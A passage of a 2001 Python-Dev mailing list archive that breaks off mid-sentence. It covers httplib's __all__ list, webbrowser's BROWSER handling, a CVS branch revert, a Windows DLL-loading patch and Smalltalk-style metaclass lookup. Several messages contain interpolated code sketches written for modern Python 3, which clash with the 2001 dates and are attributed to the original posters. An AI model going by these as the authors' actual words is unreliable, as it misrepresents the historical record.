In-Reply-To: <lCoIXKAB3mF7Ew5A@jessikat.demon.co.uk>
References: <lCoIXKAB3mF7Ew5A@jessikat.demon.co.uk>
Message-ID: <15126.34635.67975.31473@beluga.mojam.com>

>>>>> "Robin" == Robin Becker <robin@jessikat.fsnet.co.uk> writes:

    Robin> from httplib import *

    Robin> class Bongo(HTTPConnection):
    Robin>         pass
    ...
    Robin> NameError: name 'HTTPConnection' is not defined

It was a brain fart on my part when creating httplib.__all__.
HTTPConnection was not included in that list.  I will check in a fix.
In the 2.1 release __all__ was defined as 

    __all__ = ["HTTP"]

I have changed that to

    __all__ = ["HTTP", "HTTPResponse", "HTTPConnection", "HTTPSConnection",
	       "HTTPException", "NotConnected", "UnknownProtocol",
	       "UnknownTransferEncoding", "IllegalKeywordArgument",
	       "UnimplementedFileMode", "IncompleteRead",
	       "ImproperConnectionState", "CannotSendRequest", "CannotSendHeader",
	       "ResponseNotReady", "BadStatusLine", "error"]

and will check the change into CVS shortly. (Thomas, keep an eye open for
this as an addition to 2.1.1.)

The workaround I would choose is to not use "from httplib import *":

    import httplib

    class Bongo(httplib.HTTPConnection):
        pass

    Robin> Changing the * to HTTPConnection in ttt.py removes the problem.

Yup, that will also work.

Before anyone asks, "Who died and made Skip King?", the scenario as I recall
it was that the semantics of __all__ got settled on during discussions on
python-dev (the goal of __all__ being to minimize namespace pollution by
"from ... *"), but nobody stepped up immediately to do the grunt work, so I
volunteered.  The problem in relying on one person (well, at least this one
person) to do this was that I had only the following tools at my disposal to
decide what belonged in __all__:

    * what was documented in the lib reference manual (which was at times
      incomplete)
    * my experience with the various modules (some of which was specialized,
      some of which was nonexistent)
    * the standard library (which generally doesn't use "from ... *" much)
    * input from python-dev (whose members also appear not to use "from
      ... *" very liberally)

In retrospect, I probably should have polled c.l.py with a summary of what I
came up with before the 2.1 ship date.  If people would like me to do that
now (before 2.2 gets anywhere close to release) to try and fill in as many
missing symbols as possible, let me know.

-- 
Skip Montanaro (skip@pobox.com)
(847)971-7098


From skip@pobox.com (Skip Montanaro)  Thu May 31 19:06:01 2001
From: skip@pobox.com (Skip Montanaro) (Skip Montanaro)
Date: Thu, 31 May 2001 13:06:01 -0500
Subject: [Python-Dev] Damn... I think I might have just muffed a checkin
Message-ID: <15126.34825.167026.520535@beluga.mojam.com>

I just updated httplib.py to expand the list of names in its __all__ list.
I was operating on version 1.34.  After the checkin I am looking at version
1.34.2.1.  I see that Lib/CVS/Tag exists in my directory tree and says
"release21-maint".  Did I muff it?  If so, how should I do an unmuff
operation?

Skip


From robin@jessikat.fsnet.co.uk  Thu May 31 19:33:02 2001
From: robin@jessikat.fsnet.co.uk (Robin Becker)
Date: Thu, 31 May 2001 19:33:02 +0100
Subject: [Python-Dev] Re: 2.1 strangness
In-Reply-To: <15126.34635.67975.31473@beluga.mojam.com>
References: <lCoIXKAB3mF7Ew5A@jessikat.demon.co.uk>
 <15126.34635.67975.31473@beluga.mojam.com>
Message-ID: <s8$qoXAe5oF7EwbX@jessikat.fsnet.co.uk>

In message <15126.34635.67975.31473@beluga.mojam.com>, Skip Montanaro
<skip@pobox.com> writes
>>>>>> "Robin" == Robin Becker <robin@jessikat.fsnet.co.uk> writes:
>
>    Robin> from httplib import *
>
>    Robin> class Bongo(HTTPConnection):
>    Robin>         pass
>    ...
>    Robin> NameError: name 'HTTPConnection' is not defined
>
>It was a brain fart on my part when creating httplib.__all__.
>HTTPConnection was not included in that list.  I will check in a fix.
>In the 2.1 release __all__ was defined as 
>
>    __all__ = ["HTTP"]
>
>I have changed that to
>
>    __all__ = ["HTTP", "HTTPResponse", "HTTPConnection", "HTTPSConnection",
>              "HTTPException", "NotConnected", "UnknownProtocol",
>              "UnknownTransferEncoding", "IllegalKeywordArgument",
>              "UnimplementedFileMode", "IncompleteRead",
>              "ImproperConnectionState", "CannotSendRequest", "CannotSendHeader",
>              "ResponseNotReady", "BadStatusLine", "error"]

thanks; I'm still a bit puzzled as to the exact semantics. It just looks
wrong. Is __all__ the only way to get things into the * version of
import? Presumably HTTPConnection is being marked as a potential global
in the compile phase.
-- 
Robin Becker


From skip@pobox.com (Skip Montanaro)  Thu May 31 20:27:12 2001
From: skip@pobox.com (Skip Montanaro) (Skip Montanaro)
Date: Thu, 31 May 2001 14:27:12 -0500
Subject: [Python-Dev] Re: 2.1 strangness
In-Reply-To: <s8$qoXAe5oF7EwbX@jessikat.fsnet.co.uk>
References: <lCoIXKAB3mF7Ew5A@jessikat.demon.co.uk>
 <15126.34635.67975.31473@beluga.mojam.com>
 <s8$qoXAe5oF7EwbX@jessikat.fsnet.co.uk>
Message-ID: <15126.39696.370516.926735@beluga.mojam.com>

    Robin> thanks; I'm still a bit puzzled as to the exact semantics. It
    Robin> just looks wrong. Is __all__ the only way to get things into the
    Robin> * version of import?

Essentially, yes.  If you want to just dispense with it __all__together
(=:-o), you can textually replace __all__ with ___all__ in each of the
standard library modules:

    cd /usr/local/lib/python2.1
    for f in *.py ; do
	sed -e 's/___*all__/___all__/g' < "$f" > "$f.tmp"
	mv "$f.tmp" "$f"
    done

Note that I didn't touch any files in directories under the basic Lib
directory.

    Robin> Presumably HTTPConnection is being marked as a potential global
    Robin> in the compile phase.

It has nothing to do with module compilation.  The contents of __all__ are a
static thing in the text of the .py file, and thus far almost entirely due to
me studying the inputs at hand and making a decision about what belonged and
what didn't.  Some python-dev people caught omissions and added them before
the 2.1 release.  Other than that, the mistakes are all mine.
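To make the semantics concrete, here is a self-contained sketch using throwaway in-memory modules; the names `fake_httplib` and `make_module` are made up. When a module defines `__all__`, `from module import *` binds exactly those names. Without `__all__`, every name that doesn't start with an underscore is imported. The sketch is written for current Python 3.

```python
import sys
import types


def make_module(name, source):
    """Create and register an in-memory module (hypothetical helper)."""
    mod = types.ModuleType(name)
    exec(source, mod.__dict__)
    sys.modules[name] = mod  # lets the import statement find it
    return mod


# A stand-in for 2.1's httplib: __all__ omits HTTPConnection.
make_module("fake_httplib", """
__all__ = ["HTTP"]
class HTTP: pass
class HTTPConnection: pass
""")

# The same module without __all__.
make_module("fake_httplib_noall", """
class HTTP: pass
class HTTPConnection: pass
class _Private: pass
""")

with_all = {}
exec("from fake_httplib import *", with_all)
without_all = {}
exec("from fake_httplib_noall import *", without_all)

print("HTTPConnection" in with_all)     # False: only names listed in __all__
print("HTTPConnection" in without_all)  # True: all public names
print("_Private" in without_all)        # False: leading underscore skipped
```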

I had some misgivings about the whole thing during the midst of the task and
still do, but grumbled once and completed it.

Skip


From skip@pobox.com (Skip Montanaro)  Thu May 31 20:57:21 2001
From: skip@pobox.com (Skip Montanaro) (Skip Montanaro)
Date: Thu, 31 May 2001 14:57:21 -0500
Subject: [Python-Dev] weird webbrowser behavior
Message-ID: <15126.41505.987887.477670@beluga.mojam.com>

I'm using Gnome under Mandrake 8.0 and getting very strange results using
webbrowser (indirectly via pydoc).  Apparently, Gnome's init code sets the
BROWSER environment variable to "nautilus" (much to my surprise) and
webbrowser trusts it as the God's honest truth, even though nautilus has not
been registered with the webbrowser module (am I supposed to add that sort
of stuff to site.py?).  Accordingly, _tryorder is ['nautilus'], but
'nautilus' doesn't appear in _browser.keys(), which is ['lynx', 'links',
'netscape', 'kfm', 'mozilla'].  I think webbrowser should either ignore
elements of BROWSER if they have not previously been registered (and can't
be found by _iscommand) or try to register them using GenericBrowser.
Users are apparently not the only people setting BROWSER, so the comment in
the code:

    # It's the user's responsibility to register handlers for any unknown
    # browser referenced by this value, before calling open().

seems like flawed logic to me.
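Skip's proposal can be sketched as a filter over the BROWSER value. Everything here is an assumption for illustration. The helper name `resolve_browser_env` is hypothetical, and it assumes entries are separated by `os.pathsep`. It uses `shutil.which` in place of the module's private `_iscommand` and keeps controllers in a plain dict rather than calling `webbrowser.register()`.

```python
import os
import shutil
import webbrowser

def resolve_browser_env(value, registered, is_command=shutil.which):
    """Hypothetical helper: build a try-order list from a BROWSER-style string.

    Entries already present in `registered` are kept as-is.  Unknown entries
    that `is_command` can locate get a GenericBrowser controller added to
    `registered`; anything else is dropped instead of being trusted blindly.
    """
    order = []
    for name in value.split(os.pathsep):
        name = name.strip()
        if not name or name in order:
            continue  # skip blanks and duplicates
        if name not in registered:
            if not is_command(name):
                continue  # not registered and not on PATH: ignore it
            registered[name] = webbrowser.GenericBrowser(name)
        order.append(name)
    return order
```

If the result comes back empty, the caller still needs a fallback; that is the same case Skip's patch leaves open. Real code would pass the new controllers to `webbrowser.register()` instead of collecting them in a local dict.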

Skip


From esr@thyrsus.com  Thu May 31 21:08:21 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Thu, 31 May 2001 16:08:21 -0400
Subject: [Python-Dev] weird webbrowser behavior
In-Reply-To: <15126.41505.987887.477670@beluga.mojam.com>; from skip@pobox.com on Thu, May 31, 2001 at 02:57:21PM -0500
References: <15126.41505.987887.477670@beluga.mojam.com>
Message-ID: <20010531160821.A10314@thyrsus.com>

Skip Montanaro <skip@pobox.com>:
> I think webbrowser should either ignore elements of BROWSER if
> they have not previously been registered (and can't be found by _iscommand)
> or try to register them using GenericBrowser.  Users are apparently not the
> only people setting BROWSER, so the comment in the code:

Fred Drake and I are co-responsible for that code.  If you want to patch it
to do this, I won't object.
-- 
		Eric S. Raymond <http://www.tuxedo.org/~esr/>

"They that can give up essential liberty to obtain a little temporary 
safety deserve neither liberty nor safety."
	-- Benjamin Franklin, Historical Review of Pennsylvania, 1759.


From fdrake@acm.org  Thu May 31 21:18:26 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Thu, 31 May 2001 16:18:26 -0400 (EDT)
Subject: [Python-Dev] Damn... I think I might have just muffed a checkin
In-Reply-To: <15126.34825.167026.520535@beluga.mojam.com>
References: <15126.34825.167026.520535@beluga.mojam.com>
Message-ID: <15126.42770.17954.452663@cj42289-a.reston1.va.home.com>

Skip Montanaro writes:
 > I just updated httplib.py to expand the list of names in its __all__ list.
 > I was operating on version 1.34.  After the checkin I am looking at version
 > 1.34.2.1.  I see that Lib/CVS/Tag exists in my directory tree and says
 > "release21-maint".  Did I muff it?  If so, how should I do an unmuff
 > operation?

  If that's really a muff, revert the change:

        cd .../Lib/
        cvs diff -r1.34.2.1 -r1.34 httplib.py | patch

and commit the new version as 1.34.2.2:

        cvs commit -m 'unmuff...' httplib.py


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From skip@pobox.com (Skip Montanaro)  Thu May 31 21:30:22 2001
From: skip@pobox.com (Skip Montanaro) (Skip Montanaro)
Date: Thu, 31 May 2001 15:30:22 -0500
Subject: [Python-Dev] weird webbrowser behavior
In-Reply-To: <20010531160821.A10314@thyrsus.com>
References: <15126.41505.987887.477670@beluga.mojam.com>
 <20010531160821.A10314@thyrsus.com>
Message-ID: <15126.43486.320228.376505@beluga.mojam.com>

    Eric> Fred Drake and I are co-responsible for that code.  If you want to
    Eric> patch it to do this, I won't object.

Here's a first pass that seems to work for me:

    https://sourceforge.net/tracker/index.php?func=detail&aid=429136&group_id=5470&atid=305470

though it doesn't attempt to recover if _tryorder winds up empty.

Skip


From skip@pobox.com (Skip Montanaro)  Thu May 31 21:48:40 2001
From: skip@pobox.com (Skip Montanaro) (Skip Montanaro)
Date: Thu, 31 May 2001 15:48:40 -0500
Subject: [Python-Dev] Damn... I think I might have just muffed a checkin
In-Reply-To: <15126.42770.17954.452663@cj42289-a.reston1.va.home.com>
References: <15126.34825.167026.520535@beluga.mojam.com>
 <15126.42770.17954.452663@cj42289-a.reston1.va.home.com>
Message-ID: <15126.44584.300357.360209@beluga.mojam.com>

    >> I just updated httplib.py to expand the list of names in its __all__
    >> list.  I was operating on version 1.34.  After the checkin I am
    >> looking at version 1.34.2.1.  I see that Lib/CVS/Tag exists in my
    >> directory tree and says "release21-maint".  Did I muff it?  If so,
    >> how should I do an unmuff operation?

    Fred>   If that's really a muff, revert the change:

    Fred>         cd .../Lib/
    Fred>         cvs diff -r1.34.2.1 -r1.34 httplib.py | patch

    Fred> and commit the new version as 1.34.2.2:

    Fred>         cvs commit -m 'unmuff...' httplib.py

Functionally, the checkin isn't a muff (it does have the change I intended),
but I was worried about the version number.  Should I have checked it in as
version 1.34.2.1 or 1.35?

Skip


From fdrake@acm.org  Thu May 31 22:00:34 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Thu, 31 May 2001 17:00:34 -0400 (EDT)
Subject: [Python-Dev] weird webbrowser behavior
In-Reply-To: <15126.41505.987887.477670@beluga.mojam.com>
References: <15126.41505.987887.477670@beluga.mojam.com>
 <20010531160821.A10314@thyrsus.com>
Message-ID: <15126.45298.666556.20710@cj42289-a.reston1.va.home.com>

Skip Montanaro writes:
 > or try to register them using GenericBrowser.  Users are apparently not the
 > only people setting BROWSER, so the comment in the code:
 > 
 >     # It's the user's responsibility to register handlers for any unknown
 >     # browser referenced by this value, before calling open().
 > 
 > seems like flawed logic to me.

Eric S. Raymond writes:
 > Fred Drake and I are co-responsible for that code.  If you want to patch it
 > to do this, I won't object.

  I wouldn't object either.  I *do* object to the system setting that
variable by default by either Mandrake or Gnome -- that's just stupid
and inconsiderate of the user.
  Now, if anyone can provide support for Nautilus, I won't object to
that either.  Unfortunately, Mandrake's installer stinks at upgrading
(it couldn't seem to locate my 7.2 installation) and I don't have the
time to figure that out.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From fdrake@acm.org  Thu May 31 22:04:30 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Thu, 31 May 2001 17:04:30 -0400 (EDT)
Subject: [Python-Dev] Damn... I think I might have just muffed a checkin
In-Reply-To: <15126.44584.300357.360209@beluga.mojam.com>
References: <15126.34825.167026.520535@beluga.mojam.com>
 <15126.42770.17954.452663@cj42289-a.reston1.va.home.com>
 <15126.44584.300357.360209@beluga.mojam.com>
Message-ID: <15126.45534.417066.445852@cj42289-a.reston1.va.home.com>

Skip Montanaro writes:
 > Functionally, the checkin isn't a muff (it does have the change I intended),
 > but I was worried about the version number.  Should I have checked it in as
 > version 1.34.2.1 or 1.35?

  If the change should happen on the branch, leave it in.  If it's
also needed on the HEAD, check it in again there, and you're done.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From m.favas@per.dem.csiro.au  Thu May 31 23:41:13 2001
From: m.favas@per.dem.csiro.au (Mark Favas)
Date: Fri, 01 Jun 2001 06:41:13 +0800
Subject: [Python-Dev] One more dict trick
Message-ID: <3B16C889.C01905BD@per.dem.csiro.au>

Tried the patch (thanks, Tim!) - but I guess the things I'm running
aren't too sensitive to dict speed <grin>. I see a slight speed-up,
around 1-2%... Nice, elegant patch that should go places! Maybe the
bio-informatics people on c.l.py (Andrew Dalke?) would be interested in
trying it out?

-- 
Mark Favas  -   m.favas@per.dem.csiro.au
CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA


From MarkH at ActiveState.com  Tue May  1 02:42:19 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Tue, 1 May 2001 10:42:19 +1000
Subject: [Python-Dev] Importing extensions on Windows 95
In-Reply-To: <3AED7248.B7386B83@lemburg.com>
Message-ID: <LCEPIIGDJPKCOIHOBJEPOEDIDLAA.MarkH@ActiveState.com>

> Here's a stab at a patch. Could you review it and test it ? I
> don't have enough knowledge of win32 for this...

I think we can drop the getcwd call here completely.

I prefer the patch below.

Mark.

Index: dynload_win.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Python/dynload_win.c,v
retrieving revision 2.7
diff -u -r2.7 dynload_win.c
--- dynload_win.c	2000/10/05 10:54:45	2.7
+++ dynload_win.c	2001/05/01 00:36:40
@@ -163,24 +163,21 @@
 
 #ifdef MS_WIN32
 	{
-		HINSTANCE hDLL;
+		HINSTANCE hDLL = NULL;
 		char pathbuf[260];
-		if (strchr(pathname, '\\') == NULL &&
-		    strchr(pathname, '/') == NULL)
-		{
-			/* Prefix bare filename with ".\" */
-			char *p = pathbuf;
-			*p = '\0';
-			_getcwd(pathbuf, sizeof pathbuf);
-			if (*p != '\0' && p[1] == ':')
-				p += 2;
-			sprintf(p, ".\\%-.255s", pathname);
-			pathname = pathbuf;
-		}
-		/* Look for dependent DLLs in directory of pathname first */
-		/* XXX This call doesn't exist in Windows CE */
-		hDLL = LoadLibraryEx(pathname, NULL,
-				     LOAD_WITH_ALTERED_SEARCH_PATH);
+		LPTSTR dummy;
+		/* We use LoadLibraryEx so Windows looks for dependent DLLs 
+		    in directory of pathname first.  However, Windows95
+		    can sometimes not work correctly unless the absolute
+		    path is used.  If GetFullPathName() fails, the LoadLibrary
+		    will certainly fail too, so use its error code */
+		if (GetFullPathName(pathname,
+				    sizeof(pathbuf),
+				    pathbuf,
+				    &dummy))
+			/* XXX This call doesn't exist in Windows CE */
+			hDLL = LoadLibraryEx(pathname, NULL,
+					     LOAD_WITH_ALTERED_SEARCH_PATH);
 		if (hDLL==NULL){
 			char errBuf[256];
 			unsigned int errorCode;
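The idea behind the patch is to resolve the name to an absolute path before handing it to LoadLibraryEx. That idea can be sketched from Python with ctypes. This is only an illustration and assumes Python 3.8+, where `ctypes.CDLL` accepts a `winmode` argument that is passed through as the LoadLibraryEx flags. The helper names are hypothetical, and `os.path.abspath` stands in for `GetFullPathName()`.

```python
import ctypes
import os
import sys

# Win32 LoadLibraryEx flag: search the DLL's own directory for its dependencies.
LOAD_WITH_ALTERED_SEARCH_PATH = 0x00000008

def resolve_dll_path(pathname):
    """Hypothetical helper: turn a bare or relative name into an absolute
    path, playing the role GetFullPathName() plays in the patch."""
    return os.path.abspath(pathname)

def load_extension_dll(pathname):
    """Hypothetical helper: load a shared library by its absolute path."""
    full = resolve_dll_path(pathname)
    if sys.platform == "win32":
        # winmode is handed to LoadLibraryEx as its flags argument.
        return ctypes.WinDLL(full, winmode=LOAD_WITH_ALTERED_SEARCH_PATH)
    # Elsewhere there is no LoadLibraryEx; a plain CDLL is the closest analogue.
    return ctypes.CDLL(full)
```

As in the C version, a missing file makes the load fail with an error (here an `OSError`) rather than silently picking up a library from somewhere else on the search path.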


From thomas at xs4all.net  Tue May  1 10:07:48 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 1 May 2001 10:07:48 +0200
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Python bltinmodule.c,2.198,2.199
In-Reply-To: <E14tPxo-0001LL-00@usw-pr-cvs1.sourceforge.net>; from tim_one@users.sourceforge.net on Sat, Apr 28, 2001 at 01:20:24AM -0700
References: <E14tPxo-0001LL-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <20010501100748.M16486@xs4all.nl>

On Sat, Apr 28, 2001 at 01:20:24AM -0700, Tim Peters wrote:
> Update of /cvsroot/python/python/dist/src/Python
> In directory usw-pr-cvs1:/tmp/cvs-serv4629/python/dist/src/Python
> 
> Modified Files:
> 	bltinmodule.c 
> Log Message:
> Fix buglet reported on c.l.py:  map(fnc, file.xreadlines()) blows up.
> Also a 2.1 bugfix candidate (am I supposed to do something with those?).

No, not really. You can do me a favor by writing halfway decent checkin
messages (no complaints there) and keep your fingers off the 'fix
whitespace' button :) I keep a close eye on the checkins as they happen, and
save away those that might need to be checked into the 2.1.1 branch. I'll go
over them with a fine-tooth comb when I'm approaching critical release mass
:)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From mal at lemburg.com  Tue May  1 12:30:57 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Tue, 01 May 2001 12:30:57 +0200
Subject: [Python-Dev] Importing extensions on Windows 95
References: <LCEPIIGDJPKCOIHOBJEPOEDIDLAA.MarkH@ActiveState.com>
Message-ID: <3AEE9061.32239814@lemburg.com>

Mark Hammond wrote:
> 
> > Here's a stab at a patch. Could you review it and test it ? I
> > don't have enough knowledge of win32 for this...
> 
> I think we can drop the getcwd call here completely.
>
> I prefer the patch below.

If this works as expected, please check in the patch. (Note that
I have not tested the patch I posted -- I've never used VC++ for
anything other than compiling C extensions and GMP.)
 
> Mark.
> 
> Index: dynload_win.c
> ===================================================================
> RCS file: /cvsroot/python/python/dist/src/Python/dynload_win.c,v
> retrieving revision 2.7
> diff -u -r2.7 dynload_win.c
> --- dynload_win.c       2000/10/05 10:54:45     2.7
> +++ dynload_win.c       2001/05/01 00:36:40
> @@ -163,24 +163,21 @@
> 
>  #ifdef MS_WIN32
>         {
> -               HINSTANCE hDLL;
> +               HINSTANCE hDLL = NULL;
>                 char pathbuf[260];
> -               if (strchr(pathname, '\\') == NULL &&
> -                   strchr(pathname, '/') == NULL)
> -               {
> -                       /* Prefix bare filename with ".\" */
> -                       char *p = pathbuf;
> -                       *p = '\0';
> -                       _getcwd(pathbuf, sizeof pathbuf);
> -                       if (*p != '\0' && p[1] == ':')
> -                               p += 2;
> -                       sprintf(p, ".\\%-.255s", pathname);
> -                       pathname = pathbuf;
> -               }
> -               /* Look for dependent DLLs in directory of pathname first */
> -               /* XXX This call doesn't exist in Windows CE */
> -               hDLL = LoadLibraryEx(pathname, NULL,
> -                                    LOAD_WITH_ALTERED_SEARCH_PATH);
> +               LPTSTR dummy;
> +               /* We use LoadLibraryEx so Windows looks for dependent DLLs
> +                   in directory of pathname first.  However, Windows95
> +                   can sometimes not work correctly unless the absolute
> +                   path is used.  If GetFullPathName() fails, the LoadLibrary
> +                   will certainly fail too, so use its error code */
> +               if (GetFullPathName(pathname,
> +                                   sizeof(pathbuf),
> +                                   pathbuf,
> +                                   &dummy))
> +                       /* XXX This call doesn't exist in Windows CE */
> +                       hDLL = LoadLibraryEx(pathname, NULL,
> +                                            LOAD_WITH_ALTERED_SEARCH_PATH);
>                 if (hDLL==NULL){
>                         char errBuf[256];
>                         unsigned int errorCode;

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Tue May  1 23:22:11 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Tue, 01 May 2001 23:22:11 +0200
Subject: [Python-Dev] Coercion and comparison of numbers
Message-ID: <3AEF2903.79308F55@lemburg.com>

I just received a bug report for mx.Number which revealed a
problem with the comparison code in Python 2.1. Looking at
the code, it seems that one of my original coercion patches
did not make it into the core. I added a new API, PyNumber_Compare(),
which knows about the new coercion mechanism and should be called for
numbers instead of trying coercion in PyObject_Compare().

Was this part of the coercion patch left out on purpose or
a simple oversight ? I hope the latter... 

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From jack at oratrix.nl  Tue May  1 23:23:59 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Tue,  1 May 2001 23:23:59 +0200 (MET DST)
Subject: [Python-Dev] MacPython 2.1 released
Message-ID: <20010501212359.792FADDDF0@oratrix.oratrix.nl>

MacPython 2.1 is available for download. Get it via
http://www.cwi.nl/~jack/macpython.html .


Python is a high-level programming language that is suitable for
simple scripting tasks as well as writing large
applications. MacPython offers a lot of Mac-specific extensions,
including access to all major MacOS Toolbox modules (QuickDraw,
QuickTime, AppleScript and many more), an Integrated Development
Environment (in Python!), frameworks for windowing applications,
unix-compatible cgi-scripting, image-manipulation libraries, numerical
libraries, tk-based machine independent windowing and lots more. It
also uniquely among Pythons allows you to create fully self-contained
(and, hence, distributable) applications without needing a C compiler
or anything.

New in this version:
- A choice of Carbon or Classic runtime, so runs on anything between
  MacOS 8.1 and MacOS X
- Distutils support for easy installation of extension packages
- BBedit language plugin
- All the platform-independent Python 2.1 mods
- New version of Numeric
- Lots of bug fixes
- Choice of normal and active installer

Please send feedback on this release to pythonmac-sig at python.org,
where all the MacPythoneers hang out.

Enjoy,


--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From guido at digicool.com  Wed May  2 02:52:29 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 01 May 2001 19:52:29 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
Message-ID: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>

Jim Althoff (a big commercial user of J[P]ython) sent me a summary of
how metaclasses work in Smalltalk.  He should know, since he invented
them! :-)  I include it below, with his permission.

While implementing more class-like behavior for built-in types in the
experimental descr-branch in the 2.2 CVS tree, I've noticed problems
caused by Python's collapsing of class attributes and instance
attributes.

For example, suppose d is a dictionary.  My experimental changes make
d.__class__ return DictType (from the types module).
(DictType.__class__ is TypeType, by the way.)  I also added special
methods.  For example, d.__repr__() now returns repr(d).  I am
preparing for subclassing of built-in types, so I will eventually be
able to derive a class MyDictType from DictType, as follows:

class MyDictType(DictType):
  ...

Now comes the fun part.  Suppose MyDictType wants to define its own
repr():

class MyDictType(DictType):
  def __repr__(self):
    return "MyDictType(%s)" % DictType.__repr__(self)

But, (surprise, surprise!), DictType itself also has a __repr__()
method: it returns the string "<type 'dictionary'>".

So the above code would fail: DictType.__repr__() returns
repr(DictType), and DictType.__repr__(self) raises an argument count
error.  The correct __repr__ method for dictionary objects can be
found as DictType.__dict__['__repr__'], but that looks hideous!

What to do?  Pragmatically, I can make DictType.__repr__ return
DictType.__dict__['__repr__'], and all will be well in this example.
But we have to tread carefully here: DictType.__class__ is TypeType,
but DictType.__dict__['__class__'] is a descriptor for the __class__
attribute on dictionary objects.

The best rule I can think of so far is that DictType.__dict__ gives
the *true* set of attribute descriptors for dictionary objects, and is
thus similar to Smalltalk's class.methodDict that Jim describes
below.  DictType.foo is a shortcut that can resolve to either
DictType.__dict__['foo'] or to an attribute (maybe a method) of
DictType described in TypeType.__dict__['foo'], whichever is defined.
If both are defined, I propose the following, clumsy but backwards
compatible rule: if DictType.__dict__['foo'] describes a method, it
wins.  Otherwise, TypeType.__dict__['foo'] wins.
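For comparison, here is how the example plays out in present-day Python 3. Built-in types are subclassable there, and `dict` takes the place of DictType. This illustrates the lookup rule that eventually shipped, not the experimental descr-branch. A name found in the class's own `__dict__` wins over the metatype's non-data descriptors, so `dict.__repr__` is the dictionary repr rather than type's. Data descriptors on the metatype, such as `__class__`, still take precedence.

```python
class MyDict(dict):
    def __repr__(self):
        # dict.__repr__ is found in dict.__dict__ first, so this is the
        # repr for dictionary *instances*, not type.__repr__ for the class.
        return "MyDict(%s)" % dict.__repr__(self)

# The attribute and the __dict__ entry are now the same descriptor...
assert dict.__repr__ is dict.__dict__["__repr__"]
# ...while repr() of the class itself still comes from the metatype.
assert repr(dict) == "<class 'dict'>"
# __class__ is a data descriptor on the metatype, so it wins: dict's class is type.
assert dict.__class__ is type
```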

Sigh.

--Guido van Rossum (home page: http://www.python.org/~guido/)

------------------------- Jim Althoff's message ---------------------------

Hi Guido,

I was reading the discussion on class methods in the python-dev archive and
noticed your question about how Smalltalk determines the difference between
instance methods and class methods.  I have some info on this which I can't
post to python-dev, not being a member; but I thought you might be
interested in it anyway.

It turns out that I am the one that devised metaclasses in Smalltalk-80.
(On the other hand, I haven't looked at any Smalltalk implementation code
in a long time so this is merely a description of how it all started.)

Basically (I think) Smalltalk doesn't have the ambiguity you mention for
instance methods versus class methods (as Python would) because Smalltalk
doesn't do method lookup the same as Python does.

To illustrate, suppose you have object.method()  (using Python-style
syntax)

The Smalltalk method lookup is as follows:
o find the class that object is an instance of  --  this resulting thing is
a "class object" (a first-class object, same as in Python)
o since class is a "class object" one of its fields will be a dict of
methods -- let's call it class.methodDict
o find method in class.methodDict
o if found, execute method on object
o if not, do the same thing traversing the (single inheritance) superclass
chain (follow class.superClass)

I believe Python works roughly as follows (Just testing my own
understanding here -- correct me if I don't get it right):
o convert (conceptually at least) object.method() into
object.__class__.method(object)
o find a _function_ corresponding to method in object.__class__.__dict__
o if found, execute the found function (with object bound as the first arg
to function)
o if not, traverse the (multiple inheritance) superclass chain (depth
first)

I think the key difference is that Python treats object.method() the same
as it treats object.__class__.method(object).  Smalltalk doesn't do this.
In Smalltalk, object.__class__.method(object) would mean:
o consider object.__class__ to be an "object" like any other "object" in
Smalltalk (which it is)
o get the "class object" of object.__class__, namely
object.__class__.__class__
o find method in object.__class__.__class__.methodDict
o if found, execute the method on object.__class__
o if not, do the same thing traversing the (single inheritance) superclass
chain (follow object.__class__.__class__.superClass)

In other words, it is exactly the same lookup mechanism.  So there is no
ambiguity.

To summarize, in Smalltalk:

o instance methods (for instances that are not "class objects") are
specified by:  instance.instanceMethod()

o class methods are specified by:  class.classMethod()

o both of these are just object.objectMethod() since classes are objects
and the method lookup mechanism is no different from that of any other kind
of object.
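The Python side of Jim's comparison can be sketched as a tiny lookup function. This is a simplification under stated assumptions. It ignores instance `__dict__` entries, `__getattr__` and descriptor precedence. It also walks Python 3's `__mro__` (C3 order) rather than the depth-first search that classic classes in 2.1 used. The name `find_method` is hypothetical.

```python
def find_method(obj, name):
    """Simplified sketch of Python's method lookup for obj.name.

    Walks type(obj) and its bases in MRO order and binds the first match
    to obj; instance dicts and descriptor precedence are ignored.
    """
    for klass in type(obj).__mro__:
        if name in vars(klass):
            # Bind obj as the first argument, as obj.name(...) does.
            return vars(klass)[name].__get__(obj, type(obj))
    raise AttributeError(name)

class Base:
    def greet(self):
        return "hello from Base"

class Child(Base):
    pass
```

Calling `find_method(Child, "mro")` makes the Smalltalk point. A class is just another object, so the lookup for `Child` searches `type(Child)`, here `type`, exactly as the lookup for an instance searches its class.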

A concrete example:

If I have a class Date in Smalltalk and an instance of it referenced by
variable d, I would do:
o d.followingDate() for an instance method, and
o Date.currentDate() for a class method

I think this is a nice, conceptually simple model.   Things get
